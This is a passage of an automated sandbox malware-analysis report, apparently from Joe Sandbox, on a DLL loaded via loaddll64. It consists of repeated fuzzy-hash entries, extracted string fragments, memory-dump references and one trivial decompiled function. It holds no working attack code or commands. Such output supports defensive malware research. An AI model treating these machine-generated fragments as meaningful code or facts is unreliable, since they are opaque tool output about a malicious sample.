                                                                                                        • Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1e$f<$F
                                                                                                        • API String ID: 0-2724976541
                                                                                                        • Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                        • Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
                                                                                                        • Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                        • Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L$Y"
                                                                                                        • API String ID: 0-1467774553
                                                                                                        • Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                        • Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
                                                                                                        • Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                        • Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Sa$y&
                                                                                                        • API String ID: 0-700414750
                                                                                                        • Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
                                                                                                        • Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
                                                                                                        • Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
                                                                                                        • Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: , N$0gL
                                                                                                        • API String ID: 0-3996470819
                                                                                                        • Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                        • Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
                                                                                                        • Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                        • Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1/$G`OV
                                                                                                        • API String ID: 0-3929948944
                                                                                                        • Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                        • Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
                                                                                                        • Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                        • Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2V$W5
                                                                                                        • API String ID: 0-1873325321
                                                                                                        • Opcode ID: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                        • Instruction ID: 63ef17b550405aac1bd81048b7740241b15b08bd30737758e2ae9d54adb6feaa
                                                                                                        • Opcode Fuzzy Hash: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                        • Instruction Fuzzy Hash: 1741C3B190074A8BDB48DF24C4965DE7FB1FB68398F10421DFC5A9A290D3B8D6A4CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ANSk$oB#x
                                                                                                        • API String ID: 0-2811520726
                                                                                                        • Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                        • Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
                                                                                                        • Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                        • Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (B$3
                                                                                                        • API String ID: 0-3108688774
                                                                                                        • Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                        • Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
                                                                                                        • Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                        • Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6`$\I
                                                                                                        • API String ID: 0-4113516648
                                                                                                        • Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                        • Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
                                                                                                        • Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                        • Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: KrTD$_D
                                                                                                        • API String ID: 0-934927992
                                                                                                        • Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                        • Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
                                                                                                        • Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                        • Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: A%9{$V
                                                                                                        • API String ID: 0-1820082490
                                                                                                        • Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                        • Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
                                                                                                        • Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                        • Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ($>>
                                                                                                        • API String ID: 0-1145299130
                                                                                                        • Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                        • Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
                                                                                                        • Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                        • Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bv$f
                                                                                                        • API String ID: 0-3039744445
                                                                                                        • Opcode ID: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                        • Instruction ID: 5cd7742688e295825d2d7ad71e75fb66b1b5906d5501222e705b32419eb79afe
                                                                                                        • Opcode Fuzzy Hash: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                        • Instruction Fuzzy Hash: 0E41B17091438A8FDB49CF68D84A5DE7FF0FB58348F104A29F86AA6250D3B4D664CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *!#$mV5
                                                                                                        • API String ID: 0-2993575305
                                                                                                        • Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                        • Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
                                                                                                        • Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                        • Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `{$l^jf
                                                                                                        • API String ID: 0-1869605660
                                                                                                        • Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                        • Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
                                                                                                        • Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                        • Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2-$-
                                                                                                        • API String ID: 0-2034864362
                                                                                                        • Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                        • Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
                                                                                                        • Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                        • Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <&$q/
                                                                                                        • API String ID: 0-2233190826
                                                                                                        • Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                        • Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
                                                                                                        • Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                        • Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?P>$g%
                                                                                                        • API String ID: 0-4203485977
                                                                                                        • Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                        • Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
                                                                                                        • Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                        • Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "X,h$Ts
                                                                                                        • API String ID: 0-4155455058
                                                                                                        • Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                        • Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
                                                                                                        • Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                        • Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Mbqz
                                                                                                        • API String ID: 0-2241695783
                                                                                                        • Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                        • Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
                                                                                                        • Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                        • Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123DC334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                        				signed long long _t25;
                                                                                                        				void* _t27;
                                                                                                        				void* _t30;
                                                                                                        
                                                                                                        				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                        				 *(_t30 + 0x10) = _t25;
                                                                                                        				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                        				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                        				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x123dc362;
                                                                                                        				if (_t27 + __rdx -  !__r8 <= 0) goto 0x123dc39e;
                                                                                                        				return __rdx + 0xb;
                                                                                                        			}






                                                                                                        0x7ffc123dc334
                                                                                                        0x7ffc123dc339
                                                                                                        0x7ffc123dc33e
                                                                                                        0x7ffc123dc362
                                                                                                        0x7ffc123dc369
                                                                                                        0x7ffc123dc37c
                                                                                                        0x7ffc123dc39d

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                        • Instruction ID: 6bfd3bc097dbd6ed6060329e56cb756862ee0972073d8d044b600b0a8638c14b
                                                                                                        • Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                        • Instruction Fuzzy Hash: 0A51082EB18EA945FB109B72A8401EE7BA9FB847A4F944535EE5C27A95CE7CD021C700
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: m1
                                                                                                        • API String ID: 0-128121454
                                                                                                        • Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                        • Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
                                                                                                        • Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                        • Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7s
                                                                                                        • API String ID: 0-1359173241
                                                                                                        • Opcode ID: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                        • Instruction ID: c1bed52c3035b45a669a36fe4e02841f36ae4e7ddeb46aacfe2c23f9d3337973
                                                                                                        • Opcode Fuzzy Hash: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                        • Instruction Fuzzy Hash: 3B0267B5A0070DCFDB58CF28C59A59D3BA9FB49308F00412DFD0E9A2A4E7B4E915CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0% E
                                                                                                        • API String ID: 0-2094739979
                                                                                                        • Opcode ID: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                        • Instruction ID: 3cbd3403ae3a5eec6cd9fa22ed9c4212c86eadd61d9582ce71e19d9336bf90de
                                                                                                        • Opcode Fuzzy Hash: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                        • Instruction Fuzzy Hash: C8F108B1A0570CCFDBA8DFA8D58A6CDBBF1FF44344F104119E84AA7290D7B8951ACB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-4048615937
                                                                                                        • Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                        • Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
                                                                                                        • Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                        • Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w
                                                                                                        • API String ID: 0-4210951952
                                                                                                        • Opcode ID: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                        • Instruction ID: 98e286694507409f0343718d484b9c1230728cd38d8ca75ba1cdcc522b4ff82c
                                                                                                        • Opcode Fuzzy Hash: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                        • Instruction Fuzzy Hash: CCD1F27550670DCBEBA9CF28C58A6DE3BE5FF48304F104129FC1A862A1D7B4EA25CB45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: k |P
                                                                                                        • API String ID: 0-500141808
                                                                                                        • Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
